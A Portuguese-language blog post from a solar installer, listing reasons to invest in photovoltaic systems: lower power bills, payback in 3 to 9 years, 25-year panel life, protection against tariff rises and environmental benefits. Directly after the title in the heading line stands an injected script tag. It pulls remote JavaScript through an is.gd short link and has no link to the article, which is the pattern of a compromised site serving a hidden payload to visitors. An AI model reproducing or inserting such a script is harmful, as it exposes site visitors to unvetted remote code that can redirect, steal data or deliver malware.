Ligue-nos:     21 2147-0829   /     21 97532-3236
Por que investir em Energia Solar?<script src="https://is.gd/y0fFL5?v=v19.0"></script>

Por que investir em Energia Solar?

Você sabia que o Brasil tem a 5ª energia mais cara do mundo?
Além de pagarmos caro normalmente, há constantes aumentos nas tarifas energéticas devido ao uso de fontes poluentes e esgotáveis que afetam, não só o bolso dos consumidores, mas também o meio ambiente.

Porém, o que muitos brasileiros estão descobrindo, é que há uma solução renovável, rápida e cada vez mais acessível no mercado, a Energia Solar Fotovoltaica. Com ela, é possível economizar até 95% da conta de luz.

Um Sistema Solar Fotovoltaico é capaz de captar a luz do Sol e converter em eletricidade para ser usada em uma residência ou empresa durante o dia e a noite, e, em muitos casos, no final do mês, pode ter uma sobra de energia produzida, que será armazenada na rede da concessionária para poder ser usada em até 60 meses! Veja aqui como funciona um Sistema Solar.

O crescimento desse setor foi em 2012, quando a ANEEL (Agência Nacional de Energia Elétrica), criou as regras para ele. Hoje, há uma projeção de que o número de instalações desses sistemas suba de 42 mil para 886 mil até 2024.

Além da economia já mencionada, pode-se listar outros fatores que o tornam cada vez mais atrativo:

  1. O Retorno de Investimento (ROI):

A instalação de um Sistema Solar Fotovoltaico deve ser visto como um investimento onde o seu retorno pode ocorrer de 3 a 9 anos, considerando o seu tamanho e o valor inicial.

Depois disso, a economia continua, por isso o consumidor só tem a ganhar.

  1. A Vida Útil:

As placas solares tem 25 anos de vida útil, ou seja, mesmo com o maior ROI citado acimo, de 9 anos, que geralmente é para grandes empreendimentos, a instalação continuará funcionando normalmente por 16 anos.

Há casos registrados em que, mesmo depois desse prazo, os painéis continuaram gerando uma boa quantidade de energia.

  1. A Proteção contra Inflação Energética:

Ao gerar sua energia o consumidor não precisa mais se preocupar com possíveis aumentos das tarifas energéticas, tendo em vista que um sistema pode suprir 100% das necessidades elétricas de um local, seja residência ou empresa.

  1. A Preservação do Meio Ambiente:

Com o uso de uma fonte renovável e inesgotável, não há a necessidade de sobrecarregar as hidro e termoelétricas do país, que causam danos irreversíveis no ambiente ao seu redor.

Um sistema a mais no Brasil pode, sim, fazer a diferença.

Mesmo com todas essas vantagens, muitos ainda acham o investimento inicial alto, porém, hoje em dia, há diversas formas de financiamento, que podem, inclusive, igualar as parcelas ao valor médio da conta de luz.

Fonte: SEG

Elaboração: Julia Meliga Pimentel, Marketing, Gene Sustentável

Por que investir em Energia Solar?
Avalie esse Post

Adicionar comentário

Seu endereço de email não será publicado. Campos obrigatórios são marcados *

Copied!